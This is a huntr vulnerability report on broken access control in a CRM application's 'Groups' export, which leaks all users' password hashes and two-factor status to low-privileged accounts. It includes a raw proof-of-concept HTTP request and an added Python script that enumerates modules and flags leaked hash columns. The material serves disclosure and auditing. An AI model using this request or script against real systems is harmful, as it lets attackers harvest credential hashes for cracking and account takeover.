huntr
illume-security
3B3BB4F1-1AEA-4134-99EB-157F245FA752
Aug 16, 2023 - 9:41 a.m.

Insufficient access control in the export functionality for the 'Groups' module exposing user password hashes

2023-08-16 09:41:26
illume-security
www.huntr.dev
13
access control
export functionality
data exposure
user password hashes
sensitive information
web application
request exploitation
version 8.3
version 7.12.9
version 7.13.4
module enumeration

EPSS

0.001

Percentile

23.8%

Description

The web application incorrectly returns sensitive data to authenticated, lower-privileged users when they request an export from the ‘Groups’ module. The exported data includes each user’s email address, password hash and whether two-factor authentication is configured.

Proof of Concept

To export sensitive information for all users on the application, the following request could be sent (version 8.3):

POST /legacy/index.php?entryPoint=export HTTP/1.1
Host: [APPLICATION_HOSTNAME]
Cookie: EmailGridWidths=0=10&1=10&2=150&3=250&4=175&5=125; ck_login_language_20=en_us; sugar_user_theme=suite8; sugar_user_theme=SuiteP; ck_login_id_20=2ed13b79-8c22-0f61-9511-64d0d6214ce7; ck_login_language_20=en_us; LEGACYSESSID=o67um0uqlvvbq090cq47ed84vi; PHPSESSID=ec351p8sg0sf51as5grrvc66kn; XSRF-TOKEN=8IkPTqHry3UFRIx_Sk47HIS2hnLvwvVr5jp_UVm79To; ck_login_id_20=f0950665-7c37-520f-9b61-64d2066e623e
Content-Length: 26
Cache-Control: max-age=0
Sec-Ch-Ua: 
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: ""
Upgrade-Insecure-Requests: 1
Origin: [APPLICATION_HOSTNAME]
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

module=Groups&action=index

The same attack works on versions 7.12.9 and 7.13.4 by sending the request to /index.php?entryPoint=export instead (the request body is unchanged).

The intended purpose of this functionality appears to be allowing users to export data from the tables of the module page they are viewing. The testing team enumerated all of the modules present in the application and sent a series of export requests, changing the value of the module parameter to each module identified. From our testing, only the Groups module returns overly permissive data.
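The enumeration described above can be scripted. The following is an added example, not code from the report or from the application vendor: it builds the export request for either version tree (the /legacy/ path for 8.x, the bare /index.php path for 7.x), then scans each exported CSV for columns that carry credential material. The column names in the sample exports ('User Hash', 'Two Factor Auth') and the hash patterns are assumptions constructed for the example; the real column names depend on the application's field definitions, and the sample exports are constructed so the scan runs offline.

```python
"""Added example (not from the huntr report): enumerate modules against the
export entry point and flag any export that leaks user credentials.

Assumptions (not on the page): the CSV column names and hash formats below are
constructed for illustration. Network I/O is isolated in send_export() so the
parsing can be exercised offline with the constructed SAMPLE_EXPORTS."""
import csv
import http.client
import io
import re
from typing import Callable, Dict, List


def export_request(version: str, module: str) -> Dict[str, str]:
    """Path and form body for the export request shown in the PoC.

    Versions 8.x expose the legacy entry point under /legacy/; 7.x use /index.php.
    """
    major = int(version.split(".")[0])
    base = "/legacy/index.php" if major >= 8 else "/index.php"
    return {
        "method": "POST",
        "path": f"{base}?entryPoint=export",
        "body": f"module={module}&action=index",
    }


def send_export(host: str, cookie: str, req: Dict[str, str]) -> str:
    """Send one export request with an authenticated session cookie (live use only)."""
    conn = http.client.HTTPSConnection(host, timeout=30)
    conn.request(req["method"], req["path"], body=req["body"], headers={
        "Cookie": cookie,
        "Content-Type": "application/x-www-form-urlencoded",
    })
    resp = conn.getresponse()
    return resp.read().decode("utf-8", errors="replace")


# Column names and value shapes that indicate credential material.
# Constructed for this example; tune to the target's real field names.
SENSITIVE_HEADER = re.compile(r"(hash|password|pwd|two.?factor|2fa|secret)", re.I)
HASH_VALUE = re.compile(
    r"^(\$2[aby]\$\d{2}\$[./A-Za-z0-9]{53}"   # bcrypt
    r"|[0-9a-f]{32}|[0-9a-f]{40}|[0-9a-f]{64})$"  # unsalted md5/sha1/sha256 hex
)


def sensitive_columns(csv_text: str) -> List[str]:
    """Return headers whose name or values look like password hashes or MFA state."""
    reader = csv.DictReader(io.StringIO(csv_text))
    if reader.fieldnames is None:
        return []
    rows = list(reader)
    found = []
    for col in reader.fieldnames:
        by_name = bool(SENSITIVE_HEADER.search(col))
        by_value = any(HASH_VALUE.match((r.get(col) or "").strip()) for r in rows)
        if by_name or by_value:
            found.append(col)
    return found


def audit_modules(modules: List[str], fetch: Callable[[str], str]) -> Dict[str, List[str]]:
    """fetch(module) returns the export body; only modules that leak are reported."""
    leaks: Dict[str, List[str]] = {}
    for module in modules:
        cols = sensitive_columns(fetch(module))
        if cols:
            leaks[module] = cols
    return leaks


# Constructed sample exports standing in for the application's responses.
SAMPLE_EXPORTS = {
    "Accounts": "Name,Phone\nAcme Ltd,555-0100\n",
    "Groups": (
        "Name,Email,User Hash,Two Factor Auth\n"
        "alice,alice@example.com,5f4dcc3b5aa765d61d8327deb882cf99,1\n"
        "bob,bob@example.com,$2y$10$abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0,0\n"
    ),
}

if __name__ == "__main__":
    # Offline run over the constructed samples; for a live target replace the
    # fetch callable with: lambda m: send_export(host, cookie, export_request("8.3", m))
    print(audit_modules(list(SAMPLE_EXPORTS), SAMPLE_EXPORTS.__getitem__))
```

For a live test the module list comes from the application's module enumeration step, and the fetch callable wraps send_export() with the low-privileged user's session cookie; the scan then reports exactly which modules hand back hash or MFA columns, rather than relying on eyeballing each CSV.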
